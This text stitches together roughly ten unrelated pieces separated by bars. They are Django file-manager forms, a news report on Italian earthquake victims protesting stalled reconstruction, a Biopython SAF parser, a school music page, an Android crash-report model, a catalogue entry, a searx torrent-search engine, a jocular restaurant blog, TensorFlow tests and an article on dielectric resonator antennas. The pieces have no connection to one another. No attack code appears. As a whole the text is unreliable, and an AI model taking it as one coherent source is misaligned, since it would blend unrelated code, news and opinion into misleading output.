class PathField(CharField):
def __init__(self, label, help_text=None, **kwargs):
kwargs.setdefault('required', True)
kwargs.setdefault('min_length', 1)
forms.CharField.__init__(self, label=label, help_text=help_text, **kwargs)
def clean(self, value):
return normpath(CharField.clean(self, value))
class EditorForm(forms.Form):
path = PathField(label=_("File to edit"))
contents = CharField(widget=Textarea, label=_("Contents"), required=False)
encoding = CharField(label=_('Encoding'), required=False)
def clean_path(self):
return urllib.unquote(self.cleaned_data.get('path', ''))
def clean_contents(self):
return self.cleaned_data.get('contents', '').replace('\r\n', '\n')
def clean_encoding(self):
encoding = self.cleaned_data.get('encoding', '').strip()
if not encoding:
return i18n.get_site_encoding()
return encoding
class RenameForm(forms.Form):
op = "rename"
src_path = CharField(label=_("File to rename"), help_text=_("The file to rename."))
dest_path = CharField(label=_("New name"), help_text=_("Rename the file to:"))
class BaseRenameFormSet(FormSet):
op = "rename"
RenameFormSet = formset_factory(RenameForm, formset=BaseRenameFormSet, extra=0)
class CopyForm(forms.Form):
op = "copy"
src_path = CharField(label=_("File to copy"), help_text=_("The file to copy."))
dest_path = CharField(label=_("Destination location"), help_text=_("Copy the file to:"))
class BaseCopyFormSet(FormSet):
op = "copy"
CopyFormSet = formset_factory(CopyForm, formset=BaseCopyFormSet, extra=0)
class UploadFileForm(forms.Form):
op = "upload"
# The "hdfs" prefix in "hdfs_file" triggers the HDFSfileUploadHandler
hdfs_file = FileField(label=_("File to Upload"))
dest = PathField(label=_("Destination Path"), help_text=_("Filename or directory to upload to."))
class UploadArchiveForm(forms.Form):
op = "upload"
archive = FileField(label=_("Archive to Upload"))
dest = PathField(label=_("Destination Path"), help_text=_("Archive to upload to."))
class RemoveForm(forms.Form):
op = "remove"
path = PathField(label=_("File to remove"))
class RmDirForm(forms.Form):
op = "rmdir"
path = PathField(label=_("Directory to remove"))
class RmTreeForm(forms.Form):
op = "rmtree"
path = PathField(label=_("Directory to remove (recursively)"))
class BaseRmTreeFormset(FormSet):
op = "rmtree"
RmTreeFormSet = formset_factory(RmTreeForm, formset=BaseRmTreeFormset, extra=0)
class RestoreForm(forms.Form):
op = "rmtree"
path = PathField(label=_("Path to restore"))
class BaseRestoreFormset(FormSet):
op = "restore"
RestoreFormSet = formset_factory(RestoreForm, formset=BaseRestoreFormset, extra=0)
class TrashPurgeForm(forms.Form):
op = "purge_trash"
class MkDirForm(forms.Form):
op = "mkdir"
path = PathField(label=_("Path in which to create the directory"))
name = PathField(label=_("Directory Name"))
class TouchForm(forms.Form):
op = "touch"
path = PathField(label=_("Path in which to create the file"))
name = PathField(label=_("File Name"))
class ChownForm(forms.Form):
op = "chown"
path = PathField(label=_("Path to change user/group ownership"))
# These could be "ChoiceFields", listing only users and groups
# that the current user has permissions for.
user = CharField(label=_("User"), min_length=1)
user_other = CharField(label=_("OtherUser"), min_length=1, required=False)
group = CharField(label=_("Group"), min_length=1)
group_other = CharField(label=_("OtherGroup"), min_length=1, required=False)
recursive = BooleanField(label=_("Recursive"), required=False)
def __init__(self, *args, **kwargs):
super(ChownForm, self).__init__(*args, **kwargs)
self.all_groups = [ group.name for group in Group.objects.all() ]
self.all_users = [ user.username for user in User.objects.all() ]
class BaseChownFormSet(FormSet):
op = "chown"
ChownFormSet = formset_factory(ChownForm, formset=BaseChownFormSet, extra=0)
class ChmodForm(forms.Form):
op = "chmod"
path = PathField(label=_("Path to change permissions"))
# By default, BooleanField only validates when
# it's checked.
user_read = BooleanField(required=False)
user_write = BooleanField(required=False)
user_execute = BooleanField(required=False)
group_read = BooleanField(required=False)
group_write = BooleanField(required=False)
group_execute = BooleanField(required=False)
other_read = BooleanField(required=False)
other_write = BooleanField(required=False)
other_execute = BooleanField(required=False)
sticky = BooleanField(required=False)
recursive = BooleanField(required=False)
names = ("user_read", "user_write", "user_execute",
"group_read", "group_write", "group_execute",
"other_read", "other_write", "other_execute",
"sticky")
def __init__(self, initial, *args, **kwargs):
# Convert from string representation.
mode = initial.get("mode")
if mode is not None:
mode = int(mode, 8)
bools = rwx.expand_mode(mode)
for name, b in zip(self.names, bools):
initial[name] = b
logging.debug(initial)
kwargs['initial'] = initial
forms.Form.__init__(self, *args, **kwargs)
def full_clean(self):
forms.Form.full_clean(self)
if hasattr(self, "cleaned_data"):
self.cleaned_data["mode"] = rwx.compress_mode(map(lambda name: self.cleaned_data[name], self.names))
class BaseChmodFormSet(FormSet):
op = "chmod"
ChmodFormSet = formset_factory(ChmodForm, formset=BaseChmodFormSet, extra=0)
|
It is easy to understand why the earthquake victims are so angry. Just look around: There have been no changes in Arquata del Tronto since Aug. 24, when the earthquake demolished the town. The gutted houses, the rubble piled in the streets, the deep cracks on the walls left standing.
In recent months, only earthquakes seemed to remember the earthquake victims, with a cluster of seismic activity that only in recent weeks has begun to slow down. There have been tens of thousands of tremors of varying intensity. Every time the victims felt them, it was a reminder of their nightmare.
Under the town’s citadel, on Salaria Road, hundreds gathered Saturday morning to express their displeasure (an understatement) at a reconstruction that has never really begun. They blocked the road with tractors and held signs, all under the slogan “The re-shock of the earthquake victims.” Their logo is a shattered heart, and each banner bears the name of the towns they represent: not only Amatrice, Accumoli and Arquata, certainly, but also Castelluccio di Norcia, Visso, Pieve Torrina and other Macerata towns destroyed in the second seismic wave in late October.
Protesters chanted: “The earth trembles, we don’t.” Around them, police looked on, while the local police tried to divert the traffic on Salaria Road, where a bottleneck of massive proportions formed, with queues of over an hour after Acquasanta Terme, in the direction of Rome.
First Matteo Renzi, then Paolo Gentiloni were immortalized several times as they walked through the rubble in the Marche, Lazio and Umbria provinces, but their words were not followed by actions. A long winter — which put additional burden on the situation — has passed, spring was announced as the season of rebirth, but there are no signs of reconstruction. It feels as if time has not passed, and people have run out of patience: After several delays, no deadline was met.
Protesters took to the streets in 10 towns and also in Rome, in front of the Parliament and the Pantheon, representing 131 municipalities.
“We’re delivering an ultimatum to the government,” earthquake victims said. “There are no houses, no prospects and no information. Nothing is operational, the decrees issued by the government have not been implemented and everything is standing still. Gentiloni speaks of non-existent facts: The €1 billion he promised is nowhere to be found.” And they made a promise: “If we don’t get concrete results soon, we are ready to block the country.” A bleak fact captures the situation: Only 25 houses were delivered in seven months.
Every official who, for various reasons, is involved in the reconstruction is in the crosshairs: in addition to the national government and the regions, there is harsh criticism of the reconstruction commissioner, Vasco Errani. There are even those who long for the actions of Bertolaso in L'Aquila, a detail that says a lot about how the earthquake victims are at the end of their strength.
At the end of the day, among the silence in the buildings, Gentiloni made it known that “the earthquake victims are a top priority. You will see it in the budget.” The ill-concealed hope is to silence the protest. It will not go away so easily.
|
# Copyright 2001 by Katharine Lindner. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Martel based parser to read SAF formatted files.
This is a huge regular expression for SAF, built using
the 'regular expressions on steroids' capabilities of Martel.
http://www.embl-heidelberg.de/predictprotein/Dexa/optin_safDes.html
Notes:
Just so I remember -- the new end of line syntax is:
New regexp syntax - \R
\R means "\n|\r\n?"
[\R] means "[\n\r]"
This helps us have endlines be consistent across platforms.
"""
# standard library
import string
# Martel
import Martel
from Martel import RecordReader
from Martel import Str
from Martel import AnyEol
from Martel import ToEol
from Martel import Group
from Martel import Alt
from Martel import Rep
from Martel import Rep1
from Martel import Any
from Martel import AnyBut
from Martel import RepN
from Martel import Opt
from Martel import ToSep
from Martel.Expression import Assert
# --- first set up some helper constants and functions
digits = "0123456789"
valid_sequence_characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-. \t'
white_space = "\t "
valid_residue_characters = digits + white_space + chr( 0x2e )
residue_number_line = Group( "residue_number_line", \
Rep1( Any( valid_residue_characters ) ) +
AnyEol())
comment_line = Group( "comment_line", \
Str( "#" ) +
ToEol() )
ignored_line = Group( "ignored_line", \
Alt( comment_line, residue_number_line ) )
candidate_line = Group( "candidate_line", \
Assert( Str( "#" ), 1 ) +
Assert( Any( valid_residue_characters ), 1 ) +
ToSep( sep = ' ' ) +
Rep( Any( valid_sequence_characters ) ) +
ToEol() )
saf_record = Group( "saf_record", \
candidate_line + Rep( Alt( candidate_line, ignored_line ) ) + Opt( Str( "#" ) ) )
|
We are very proud of the music teaching and learning that takes place in our school and the standard of attainment our pupils achieve in this subject.
Our music curriculum is led by Mrs Z Griffiths - a specialist music teacher - who is employed directly by the school and teaches four afternoons a week in Key Stage 2.
The hard work of Mrs Griffiths and the quality of our music curriculum has been recognised by the Staffordshire and Stoke on Trent Music Education Hub which has awarded the school an Excellence in Music Provision Award - Silver for 2016 / 17.
We are very proud of this achievement as it shows how much we value music as part of the curriculum within our school and how we work hard to develop the skills of our pupils in this subject.
|
from django.db import models
REPORT_STATUS = (
("solved","Solved"),
("unsolved","Unsolved"),
)
class CrashReport(models.Model):
stack_trace = models.TextField(default="")
logcat = models.TextField(default="")
shared_preferences = models.TextField(default="")
environment = models.TextField(default="")
total_mem_size = models.BigIntegerField(default=0,verbose_name='Total Memory Size')
initial_configuration = models.TextField(default="")
display = models.TextField(default="")
available_mem_size = models.BigIntegerField(default=0,verbose_name='Available Memory Size')
phone_model = models.CharField(max_length=50,default="")
user_comment = models.TextField(default="")
crash_configuration = models.TextField(default="")
device_features = models.TextField(default="")
settings_system = models.TextField(default="",verbose_name='System Settings')
file_path = models.CharField(max_length=100,default="")
installation_id = models.CharField(max_length=100,default="")
user_crash_date = models.CharField(max_length=50,default="",verbose_name='Crash Date')
app_version_name = models.CharField(max_length=50,default="",verbose_name='Version Name')
user_app_start_date = models.CharField(max_length=50,default="",verbose_name='Application Start Date')
settings_global = models.TextField(default="",verbose_name='Global Settings')
build = models.TextField(default="")
settings_secure = models.TextField(default="",verbose_name='Secure Settings')
dumpsys_meminfo = models.TextField(default="")
user_email = models.CharField(max_length=50,default="")
report_id = models.CharField(max_length=100,default="")
product = models.CharField(max_length=50,default="")
package_name = models.CharField(max_length=100,default="",verbose_name='Package Name')
brand = models.CharField(max_length=50,default="")
android_version = models.CharField(max_length=50,default="")
app_version_code = models.CharField(max_length=50,default="",verbose_name='Version Code')
is_silent = models.CharField(max_length=50,default="")
custom_data = models.TextField(default="")
description = models.TextField(default="")
solved = models.CharField(max_length=10,choices=REPORT_STATUS,default="unsolved",verbose_name='Status')
created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return ('Device: %s %s - Android: %s - Application: %s Version: %s') % (self.brand,self.product,self.android_version,self.app_version_name,self.app_version_code)
def __unicode__(self):
return ('Device: %s %s - Android: %s - Application: %s Version: %s') % (self.brand,self.product,self.android_version,self.app_version_name,self.app_version_code)
|
Collected Works / 1, Selected papers 1.
Frankfurt am Main : Hänsel-Hohenhausen, 2003.
Deutsche Hochschulschriften, 1231.; Reprint philosophy, 1.
Gustav Bergmann. [Einf. von Erwin Tegtmeier].
|
"""
BTDigg (Videos, Music, Files)
@website https://btdig.com
@provide-api yes (on demand)
@using-api no
@results HTML (using search portal)
@stable no (HTML can change)
@parse url, title, content, filesize, files, magnetlink
"""
from lxml import html
from searx.engines.xpath import extract_text
from searx.url_utils import quote, urljoin
from searx.utils import get_torrent_size
# engine dependent config
categories = ['videos', 'music', 'files']
paging = True
# search-url
url = 'https://btdig.com'
search_url = url + '/search?q={search_term}&p={pageno}'
# do search-request
def request(query, params):
params['url'] = search_url.format(search_term=quote(query),
pageno=params['pageno'] - 1)
return params
# get response from search-request
def response(resp):
results = []
dom = html.fromstring(resp.text)
search_res = dom.xpath('//div[@class="one_result"]')
# return empty array if nothing is found
if not search_res:
return []
# parse results
for result in search_res:
link = result.xpath('.//div[@class="torrent_name"]//a')[0]
href = urljoin(url, link.attrib.get('href'))
title = extract_text(link)
excerpt = result.xpath('.//div[@class="torrent_excerpt"]')[0]
content = html.tostring(excerpt, encoding='unicode', method='text', with_tail=False)
# it is better to emit <br/> instead of |, but html tags are verboten
content = content.strip().replace('\n', ' | ')
content = ' '.join(content.split())
filesize = result.xpath('.//span[@class="torrent_size"]/text()')[0].split()[0]
filesize_multiplier = result.xpath('.//span[@class="torrent_size"]/text()')[0].split()[1]
files = (result.xpath('.//span[@class="torrent_files"]/text()') or ['1'])[0]
# convert filesize to byte if possible
filesize = get_torrent_size(filesize, filesize_multiplier)
# convert files to int if possible
try:
files = int(files)
except ValueError:
files = None
magnetlink = result.xpath('.//div[@class="torrent_magnet"]//a')[0].attrib['href']
# append result
results.append({'url': href,
'title': title,
'content': content,
'filesize': filesize,
'files': files,
'magnetlink': magnetlink,
'template': 'torrent.html'})
# return results
return results
|
A sample of some of Provos top dishes as featured in the summer issue of Where When How. For past Provo Bites, click here. We’ll be there in a week for another culinary adventure.
Wahoo Carpaccio at Caicos Cafe – If there’s anything as exciting as the left side of Caicos Cafe’s menu it is in my humble opinion the right side of the menu. All that excitement causing the specials on the board to look lonely and out of place, like the lone sock in your sock drawer missing its partner (Why do people keep the single socks. Hard to say goodbye or are they waiting for a miraculous appearance of some sort). At any rate, all sorts of food magic can also be found on that special board, and if there’s fresh Wahoo in the house there’s a good chance “Mad Max” will add it in this Carpaccio form. Expertly prepared, sprinkled with capers and pink peppercorns, perfectly cut, silky smooth, melt in your mouth buttery “When Harry Met Sally” seafoodgasm goodness, worthy of a run on sentence. Get this!
Conch Chowder at Le Bouchon. Yes, these guys make a killer Steak Frites. Yes, their escargot will make you slap your mama. Yes, the place is always full of beautiful people, and NO that’s not the main reason we keep going back there Mrs Ziggy, aka the most beautiful woman I know. And yes, even the simple stuff like the smoky, perfectly spiced, uncreamy Chowder is a winner at Le Bouchon Du Village. If there’s one dish that showcases Pierrick’s and Julian attention to detail, this may be the one.
Peruvian Conch Ceviche at Seaside. Here’s a fun tidbit for your next cocktail party. Most people don’t realize the role Peru played in our ability to function as a society. Transportation networks, roped bridges, the Pisco Sour: all invented in ancient Peru. But the biggest contribution that most don’t know about is the ceviche, the grandfather of TCI’s national dish, Conch Salad. Young master chef Francois mixes in various peppers, including Scotch Bonnet, to give it the proper pleasant heat with just enough acid from the lime. And in true Peruvian style, he throws in plenty of fresh veggies, including corn, to make it the island Conch Salad to beat. The equally outstanding tuna sashimi made this choice a tough one.
Romaine Lettuce at Lupo – We all have our routines right before heading to Turks and Caicos. Mine is having my fortune told. “You will choose wisely” was a common theme, and I have to tell you readers, those fortune cookies are correct more often than not. So I went against my comfort zone more often and ordered things that I normally never do, like this play on Caesar Salad. Quite possibly the best Caesar you will ever eat. Smoky Romaine, sharp Parm and crispy Pancetta bits round this piece of deliciousness. Nicely done Lupo!
Fettuccine with Guanciale and Black Truffles at Via Veneto – The fatty, deliciously salty Guanciale (pork cheeks) plays an important part here. But its all about that truffle essence that tells the brain “now this is gonna be yummy (foodie technical term)”. Just like when you put your shoes on and it feels sort of wet inside and you suddenly remember that your toddler was playing hide and seek again in the closet the night before and got a wee bit excited, your brain tells you its time to remove those shoes from your feet. Via Veneto is quickly becoming another Italian force to be reckoned with.
Sautéed Whole Snapper at Bugaloos (top)- A Snapper a day keeps the doctor away… and brings the creditors closer. Take your creditors to Bugaloos so they could understand. Freshly caught Red Snapper doesn’t require too much handling. Some coconut milk, onions, pepper, garlic, and simple seasoning is the best compliment for the mouthwatering perfectly flaky piece of fish. The inner barbarian Ziggy came out to attack this one with full force. While the inner feminine Ziggy required an emergency cookie stop 20 minutes later.
I, Ziggy the II, bite my nails! I don't do it because I'm often nervous, gamble, or watch "The Bachelor" a lot. It's just a habit I developed as a child that never really went away. And after reading a report on Twitter by a reliable source that, get this, people who bite their nails tend to have a stronger immune system and rarely get sick, I'm not stopping any time soon. I may even offer to bite other people's nails if they suffer from this fetish. I do very rarely get sick. I also have this thing where I need to lick my fingers before using a napkin, no matter who I'm eating with and where I am. Using napkins on saucy fingers just feels very wrong. I may also have been a tiny little bit stinky before this particular meal, after a 4-hour walking tour of Hell's Kitchen I was conducting right beforehand. Not to mention the bike run to Tribeca for Nish Nush falafel for lunch.
So here I was…slightly stinky, tehina smelling, unmanicured fingers, on our anniversary dinner at the oil tycoon section of 2 Michelin Star Marea. Being surrounded by big glamour, and wealth I felt as comfortable as watching a Cialis commercial with the kids. But, after 2 drinks it didn’t take long until we settled down and enjoyed another fine meal at one of New York’s finest. By the way, I did shave for this one. I’m not an animal!
Crudo trio – Pretty forgettable overall. Exhibit A: I don’t remember much of it. Tried the razor clams, langoustine, and snapper. The snapper (Dentice) had the most flavor, and the Razor Clams not nearly as good as little sister Costata.
Halibut – I wasn't too sure about this one. I mean, it's a freakin' halibut (firm, mild, dries quickly), and very often for us, after all those rich primis, fish just doesn't deliver much. This one did! The halibut was cooked nicely, not too dry, but what made the dish was the Fregola Sarda, a little bubbly Israeli couscous-like pasta. With a little pleasant heat, the pasta worked very well with the mild fish.
The boats were fun, although most likely built during biblical times. I developed a child labor technique called OOM-PAH (patent pending). Shouting “OOM-PAH” meant they both row to the drum-like beat, “OOM” means just the right child, “PAH” means left. The faster the chant, the faster the row. It worked for us in that we got back in time (1 hour) and no baby turtles were hurt in the process. One mother turtle got almost killed, but she was at the wrong place, at the wrong time.
After that we looked for a table at the boathouse for a drink but no luck. So we trekked a little further to the other boat rental spot where you rent a remote control to navigate your assigned sailboat. Had some fun with that, climbed Alice in Wonderland (I think I may have killed something else – another turtle), Belvedere Castle, and headed toward dinner.
Having been to New Orleans, and San Francisco, while living in NYC, I’m starting to believe it. He was talking about food, right? I believe so. As I’ve said before, I always compare the excitement of going to NOLA to that of Italy. Amazing, in a way somewhat foreign cuisine in one heck of a unique setting. Without further ado, here are our top NOLA bites during a recent trip.
BBQ Shrimp at Bevi – I’ll start with the no-brainer. Perhaps our top eat came from a little shack in Metairie about 30 minutes out from the quarter, close to the airport. We came for the Crawfish boil and got that and so much more. Huge, plump fresh perfectly cooked head-on gulf shrimp complimented by what I can only describe as Sauce of Dreams. Or maybe it was the beer talking, as in Canebrake beer, the sauce main ingredient. Move over Mr B’s, and say hello to Mr B!
Chargrilled Oysters at Felix’s – Last trip we enjoyed them at Drago’s who invented the Chargrilled Oysters, but now we have a new favorite looks like. They are not as cheesey and buttery at Felix’s but lightly breaded, some lemon, oil and a little bit of cheese just enough to bring out the flavors of the oysters without overpowering.
BBQ Shrimp at Mr B’s – Yes, two BBQ Shrimp dishes on the list this time, which prompted me to ask on Chowhound where I can get this in NYC. No replies so far, and it's been at least 5 minutes! This thing was our top eat last time and the only repeater on the list. If you can't get to Metairie, or even if you can, get this!
Warning: Some of these images may be disturbing. They may include large crowds, pictures of alcoholic beverages, tender grilled octopuses (yes, octopuses is not only acceptable but rolls off the tongue better.. try saying it a few times.. Octopuses) and ways in which we can cheat the system and walk around holding an alcoholic beverage on the streets of NY. They may also include scenes way too familiar to the average NY food festival goer including pictures of Shish Kebab, corn, and strange looking dudes sporting cats and giant beer bottles on their heads.
I’m also taking this opportunity to award the first ever ZAG award to the vendor showing excellence via most palatable eats. The ZAG (Ziggy Against Gyros) goes to Empanada Mama and their terrific Brazil and Spicy Chicken Empanadas. Congratulations guys.
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg import linear_operator_util
from tensorflow.python.platform import test
random_seed.set_random_seed(23)
rng = np.random.RandomState(0)
class AssertZeroImagPartTest(test.TestCase):
def test_real_tensor_doesnt_raise(self):
x = ops.convert_to_tensor([0., 2, 3])
with self.test_session():
# Should not raise.
linear_operator_util.assert_zero_imag_part(x, message="ABC123").run()
def test_complex_tensor_with_imag_zero_doesnt_raise(self):
x = ops.convert_to_tensor([1., 0, 3])
y = ops.convert_to_tensor([0., 0, 0])
z = math_ops.complex(x, y)
with self.test_session():
# Should not raise.
linear_operator_util.assert_zero_imag_part(z, message="ABC123").run()
def test_complex_tensor_with_nonzero_imag_raises(self):
x = ops.convert_to_tensor([1., 2, 0])
y = ops.convert_to_tensor([1., 2, 0])
z = math_ops.complex(x, y)
with self.test_session():
with self.assertRaisesOpError("ABC123"):
linear_operator_util.assert_zero_imag_part(z, message="ABC123").run()
class AssertNoEntriesWithModulusZeroTest(test.TestCase):
def test_nonzero_real_tensor_doesnt_raise(self):
x = ops.convert_to_tensor([1., 2, 3])
with self.test_session():
# Should not raise.
linear_operator_util.assert_no_entries_with_modulus_zero(
x, message="ABC123").run()
def test_nonzero_complex_tensor_doesnt_raise(self):
x = ops.convert_to_tensor([1., 0, 3])
y = ops.convert_to_tensor([1., 2, 0])
z = math_ops.complex(x, y)
with self.test_session():
# Should not raise.
linear_operator_util.assert_no_entries_with_modulus_zero(
z, message="ABC123").run()
def test_zero_real_tensor_raises(self):
x = ops.convert_to_tensor([1., 0, 3])
with self.test_session():
with self.assertRaisesOpError("ABC123"):
linear_operator_util.assert_no_entries_with_modulus_zero(
x, message="ABC123").run()
def test_zero_complex_tensor_raises(self):
x = ops.convert_to_tensor([1., 2, 0])
y = ops.convert_to_tensor([1., 2, 0])
z = math_ops.complex(x, y)
with self.test_session():
with self.assertRaisesOpError("ABC123"):
linear_operator_util.assert_no_entries_with_modulus_zero(
z, message="ABC123").run()
class BroadcastMatrixBatchDimsTest(test.TestCase):
def test_zero_batch_matrices_returned_as_empty_list(self):
self.assertAllEqual(
[], linear_operator_util.broadcast_matrix_batch_dims([]))
def test_one_batch_matrix_returned_after_tensor_conversion(self):
arr = rng.rand(2, 3, 4)
tensor, = linear_operator_util.broadcast_matrix_batch_dims([arr])
self.assertTrue(isinstance(tensor, ops.Tensor))
with self.test_session():
self.assertAllClose(arr, tensor.eval())
def test_static_dims_broadcast(self):
# x.batch_shape = [3, 1, 2]
# y.batch_shape = [4, 1]
# broadcast batch shape = [3, 4, 2]
x = rng.rand(3, 1, 2, 1, 5)
y = rng.rand(4, 1, 3, 7)
batch_of_zeros = np.zeros((3, 4, 2, 1, 1))
x_bc_expected = x + batch_of_zeros
y_bc_expected = y + batch_of_zeros
x_bc, y_bc = linear_operator_util.broadcast_matrix_batch_dims([x, y])
with self.test_session() as sess:
self.assertAllEqual(x_bc_expected.shape, x_bc.get_shape())
self.assertAllEqual(y_bc_expected.shape, y_bc.get_shape())
x_bc_, y_bc_ = sess.run([x_bc, y_bc])
self.assertAllClose(x_bc_expected, x_bc_)
self.assertAllClose(y_bc_expected, y_bc_)
def test_static_dims_broadcast_second_arg_higher_rank(self):
# x.batch_shape = [1, 2]
# y.batch_shape = [1, 3, 1]
# broadcast batch shape = [1, 3, 2]
x = rng.rand(1, 2, 1, 5)
y = rng.rand(1, 3, 2, 3, 7)
batch_of_zeros = np.zeros((1, 3, 2, 1, 1))
x_bc_expected = x + batch_of_zeros
y_bc_expected = y + batch_of_zeros
x_bc, y_bc = linear_operator_util.broadcast_matrix_batch_dims([x, y])
with self.test_session() as sess:
self.assertAllEqual(x_bc_expected.shape, x_bc.get_shape())
self.assertAllEqual(y_bc_expected.shape, y_bc.get_shape())
x_bc_, y_bc_ = sess.run([x_bc, y_bc])
self.assertAllClose(x_bc_expected, x_bc_)
self.assertAllClose(y_bc_expected, y_bc_)
def test_dynamic_dims_broadcast_32bit(self):
# x.batch_shape = [3, 1, 2]
# y.batch_shape = [4, 1]
# broadcast batch shape = [3, 4, 2]
x = rng.rand(3, 1, 2, 1, 5).astype(np.float32)
y = rng.rand(4, 1, 3, 7).astype(np.float32)
batch_of_zeros = np.zeros((3, 4, 2, 1, 1)).astype(np.float32)
x_bc_expected = x + batch_of_zeros
y_bc_expected = y + batch_of_zeros
x_ph = array_ops.placeholder(dtypes.float32)
y_ph = array_ops.placeholder(dtypes.float32)
x_bc, y_bc = linear_operator_util.broadcast_matrix_batch_dims([x_ph, y_ph])
with self.test_session() as sess:
x_bc_, y_bc_ = sess.run([x_bc, y_bc], feed_dict={x_ph: x, y_ph: y})
self.assertAllClose(x_bc_expected, x_bc_)
self.assertAllClose(y_bc_expected, y_bc_)
def test_dynamic_dims_broadcast_32bit_second_arg_higher_rank(self):
# x.batch_shape = [1, 2]
# y.batch_shape = [3, 4, 1]
# broadcast batch shape = [3, 4, 2]
x = rng.rand(1, 2, 1, 5).astype(np.float32)
y = rng.rand(3, 4, 1, 3, 7).astype(np.float32)
batch_of_zeros = np.zeros((3, 4, 2, 1, 1)).astype(np.float32)
x_bc_expected = x + batch_of_zeros
y_bc_expected = y + batch_of_zeros
x_ph = array_ops.placeholder(dtypes.float32)
y_ph = array_ops.placeholder(dtypes.float32)
x_bc, y_bc = linear_operator_util.broadcast_matrix_batch_dims([x_ph, y_ph])
with self.test_session() as sess:
x_bc_, y_bc_ = sess.run([x_bc, y_bc], feed_dict={x_ph: x, y_ph: y})
self.assertAllClose(x_bc_expected, x_bc_)
self.assertAllClose(y_bc_expected, y_bc_)
def test_less_than_two_dims_raises_static(self):
x = rng.rand(3)
y = rng.rand(1, 1)
with self.assertRaisesRegexp(ValueError, "at least two dimensions"):
linear_operator_util.broadcast_matrix_batch_dims([x, y])
with self.assertRaisesRegexp(ValueError, "at least two dimensions"):
linear_operator_util.broadcast_matrix_batch_dims([y, x])
class MatmulWithBroadcastTest(test.TestCase):
def test_static_dims_broadcast(self):
# batch_shape = [2]
# for each batch member, we have a 1x3 matrix times a 3x7 matrix ==> 1x7
x = rng.rand(2, 1, 3)
y = rng.rand(3, 7)
y_broadcast = y + np.zeros((2, 1, 1))
with self.test_session():
result = linear_operator_util.matmul_with_broadcast(x, y)
self.assertAllEqual((2, 1, 7), result.get_shape())
expected = math_ops.matmul(x, y_broadcast)
self.assertAllEqual(expected.eval(), result.eval())
def test_dynamic_dims_broadcast_32bit(self):
# batch_shape = [2]
# for each batch member, we have a 1x3 matrix times a 3x7 matrix ==> 1x7
x = rng.rand(2, 1, 3)
y = rng.rand(3, 7)
y_broadcast = y + np.zeros((2, 1, 1))
x_ph = array_ops.placeholder(dtypes.float64)
y_ph = array_ops.placeholder(dtypes.float64)
with self.test_session() as sess:
result, expected = sess.run(
[linear_operator_util.matmul_with_broadcast(x_ph, y_ph),
math_ops.matmul(x, y_broadcast)],
feed_dict={x_ph: x, y_ph: y})
self.assertAllEqual(expected, result)


class DomainDimensionStubOperator(object):
def __init__(self, domain_dimension):
self._domain_dimension = ops.convert_to_tensor(domain_dimension)

  def domain_dimension_tensor(self):
return self._domain_dimension


class AssertCompatibleMatrixDimensionsTest(test.TestCase):
def test_compatible_dimensions_do_not_raise(self):
with self.test_session():
x = ops.convert_to_tensor(rng.rand(2, 3, 4))
operator = DomainDimensionStubOperator(3)
# Should not raise
linear_operator_util.assert_compatible_matrix_dimensions(
operator, x).run()

  def test_incompatible_dimensions_raise(self):
with self.test_session():
x = ops.convert_to_tensor(rng.rand(2, 4, 4))
operator = DomainDimensionStubOperator(3)
with self.assertRaisesOpError("Incompatible matrix dimensions"):
linear_operator_util.assert_compatible_matrix_dimensions(
operator, x).run()


if __name__ == "__main__":
test.main()
|
With the rise of 5G and other wireless millimeter-wave applications, there has been an increase in front-end antenna solutions that depend on monopole, dipole, and patch antennas. In these devices, the radiation efficiency tends to suffer due to the effect of lossy silicon substrate materials. Enter the dielectric resonator: Antennas using these resonators (made of nonmetallic materials) have a higher radiation efficiency. To increase directivity and gain at high frequencies, engineers can optimize dielectric resonator antenna (DRA) designs with simulation.
In the late 1800s, Lord Rayleigh discovered that a long rod made of a dielectric (i.e., nonconductive) material could act as a waveguide. Scientists continued to study the electromagnetic phenomena surrounding these materials, but there were no practical applications yet.
In 1939, American physicist Robert Richtmyer showed that dielectric rods can also act as resonators. He also proved that this type of resonator radiates because of the boundary conditions at the interface where the dielectric material meets air. Although Richtmyer’s work was significant in the development of DRAs, certain materials necessary to their operation were not readily available until the 1960s.
A disassembled RF diplexer at a 5-GHz range with 2 dielectric resonator waveguide filters and 9 transverse resonator stages per filter. Image by wdwd — Own work. Licensed under CC BY-SA 4.0, via Wikimedia Commons.
Later on, DRAs were used as filter elements in microwave circuits. Starting in the 1980s, they got smaller and could operate at higher frequencies, enabling electrical engineers to further develop application areas such as wireless communication.
Today, DRAs are common in satellite and radar systems and are even used in nanophotonics. They also show potential in developing application areas like 5G technology. To improve the performance of DRAs at microwave (and higher) frequencies for future applications, engineers can evaluate designs using the RF Module, an add-on product to the COMSOL Multiphysics® software.
In this example, the dielectric resonator, made of quartz, is the basic radiating element, and passive metallic elements are added to increase the antenna's directivity and gain. The DRA is excited by a slot-coupled microstrip line, while the passive metallic strips act as directors, guiding the radiation pattern and enhancing the radiation behavior. Here, two strips are placed along the top of the block, with two loops located on each of its faces. The dimensions of these elements are chosen so that they're resonant at the operating frequency of 2.9 GHz.
The antenna's power source is represented by a lumped port feeding a microstrip line, which couples to the resonator through the slot. The microstrip line extends beyond the slot to form a tuning stub and, along with the ground plane, is treated as infinitely thin and a perfect electric conductor (PEC). The resonator is surrounded by a sphere with the properties of a vacuum, bounded by a perfectly matched layer (PML) that acts as the boundary to free space.
As for meshing, it’s best to stick to at least five elements per wavelength in each material, and curved edges and surfaces with at least two elements per 90° chord. A swept mesh is suitable for the PML areas, and you can use tetrahedral elements of unit aspect ratio for the other modeling regions. The mesh is automatically configured through the physics-controlled mesh.
